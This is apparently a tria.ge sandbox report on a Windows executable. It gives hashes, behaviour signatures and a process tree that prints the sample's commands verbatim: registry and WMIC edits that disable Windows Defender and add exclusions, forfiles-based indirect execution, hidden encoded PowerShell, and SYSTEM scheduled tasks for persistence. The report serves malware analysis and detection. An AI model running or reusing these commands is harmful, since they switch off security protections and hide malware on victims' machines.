Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    221s
  • max time network
    223s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    02/09/2024, 05:09

General

  • Target

    da79fe7bff1e3651b0439744dd7c171556fd94c6c7ac53d7f1f9420c08c9f5b4.exe

  • Size

    7.3MB

  • MD5

    dbe7a8b6a43ecb85364a6c2b41eb0112

  • SHA1

    baf85c9c07b332c5c1b7d82b89d52942ea79630b

  • SHA256

    da79fe7bff1e3651b0439744dd7c171556fd94c6c7ac53d7f1f9420c08c9f5b4

  • SHA512

    bc16d6c63fd5d3edc0c37c4539baf8c9be9ab36900f2b60a833b6934567909534e5a3a260cc159ebc98628e35034a13c22540738206b8d795fa7f1844c06348d

  • SSDEEP

    196608:91OZKvsBkanBcd1n/VzRXJh2dQoRV91guTDTueTZxRaE/:3OcvHaOdxJhAVwuTDB9nv/

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\da79fe7bff1e3651b0439744dd7c171556fd94c6c7ac53d7f1f9420c08c9f5b4.exe
    "C:\Users\Admin\AppData\Local\Temp\da79fe7bff1e3651b0439744dd7c171556fd94c6c7ac53d7f1f9420c08c9f5b4.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Users\Admin\AppData\Local\Temp\7zSADCC.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Users\Admin\AppData\Local\Temp\7zSB4DE.tmp\Install.exe
        .\Install.exe /BdidrDIH "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2996
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3048
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3064
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:3068
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1588
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2192
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2976
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                PID:3028
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2532
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                      PID:3044
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  5⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  PID:2132
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    6⤵
                      PID:2584
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        7⤵
                          PID:2640
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      5⤵
                      • Indirect Command Execution
                      PID:2656
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        6⤵
                          PID:2660
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                            7⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2668
                            • C:\Windows\SysWOW64\gpupdate.exe
                              "C:\Windows\system32\gpupdate.exe" /force
                              8⤵
                              • System Location Discovery: System Language Discovery
                              PID:2444
                    • C:\Windows\SysWOW64\forfiles.exe
                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                      4⤵
                      • Indirect Command Execution
                      PID:2800
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2604
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2636
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            7⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2608
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "byQqbWVboeSiQfgDlP" /SC once /ST 05:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RoPfBoimVzGRLRwMm\uZMESWoADnbiOPj\Yihjwty.exe\" pl /TfSdidpQ 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1784
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 592
                      4⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:1724
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {57AD717D-DD24-4CDC-A3E8-EDB3119BA494} S-1-5-18:NT AUTHORITY\System:Service:
                1⤵
                  PID:1028
                  • C:\Users\Admin\AppData\Local\Temp\RoPfBoimVzGRLRwMm\uZMESWoADnbiOPj\Yihjwty.exe
                    C:\Users\Admin\AppData\Local\Temp\RoPfBoimVzGRLRwMm\uZMESWoADnbiOPj\Yihjwty.exe pl /TfSdidpQ 525403 /S
                    2⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:1668
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2688
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        PID:2784
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          5⤵
                            PID:2944
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              6⤵
                                PID:2828
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            PID:2940
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                              5⤵
                                PID:2812
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  6⤵
                                    PID:3060
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                4⤵
                                • Indirect Command Execution
                                • System Location Discovery: System Language Discovery
                                PID:2480
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                  5⤵
                                    PID:2904
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      6⤵
                                        PID:2952
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                    4⤵
                                    • Indirect Command Execution
                                    • System Location Discovery: System Language Discovery
                                    PID:2804
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      5⤵
                                        PID:2796
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          6⤵
                                            PID:2964
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                        4⤵
                                        • Indirect Command Execution
                                        PID:2332
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                          5⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2540
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                            6⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • System Location Discovery: System Language Discovery
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:908
                                            • C:\Windows\SysWOW64\gpupdate.exe
                                              "C:\Windows\system32\gpupdate.exe" /force
                                              7⤵
                                                PID:2164
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "gKTSiKHGJ" /SC once /ST 04:58:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        3⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:780
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "gKTSiKHGJ"
                                        3⤵
                                          PID:2972
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /DELETE /F /TN "gKTSiKHGJ"
                                          3⤵
                                            PID:1432
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:328
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                              4⤵
                                              • Modifies Windows Defender Real-time Protection settings
                                              • System Location Discovery: System Language Discovery
                                              PID:1616
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                            3⤵
                                              PID:2260
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                4⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                PID:1904
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /CREATE /TN "gZkKrNVUZ" /SC once /ST 02:44:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                              3⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2880
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /run /I /tn "gZkKrNVUZ"
                                              3⤵
                                                PID:2212
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /DELETE /F /TN "gZkKrNVUZ"
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1900
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                3⤵
                                                • Indirect Command Execution
                                                PID:1728
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                  4⤵
                                                    PID:1560
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                      5⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2560
                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2488
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                    PID:928
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1868
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:64
                                                    3⤵
                                                      PID:2016
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:2436
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:32
                                                      3⤵
                                                        PID:2484
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:1400
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:64
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:108
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                              PID:1648
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /C copy nul "C:\Windows\Temp\eARlaXjMdtDvPsxl\iAFjSnID\qyLubuMDXzYhwyTO.wsf"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1836
                                                          • C:\Windows\SysWOW64\wscript.exe
                                                            wscript "C:\Windows\Temp\eARlaXjMdtDvPsxl\iAFjSnID\qyLubuMDXzYhwyTO.wsf"
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:580
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MPFNXoKXzyqBDJwgtRR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1696
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MPFNXoKXzyqBDJwgtRR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1244
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNFoOxfNKqcU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2784
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNFoOxfNKqcU2" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2812
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VEimOQGFjqRbC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2964
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VEimOQGFjqRbC" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1684
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cZbJtpIpASUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1780
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cZbJtpIpASUn" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:636
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cbXLGCfkU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2696
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cbXLGCfkU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1316
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XmGOnMMGQtrDCnVB" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1788
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XmGOnMMGQtrDCnVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:664
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2768
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:900
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RoPfBoimVzGRLRwMm" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2312
                                                            • C:\Windows\SysWOW64\reg.exe
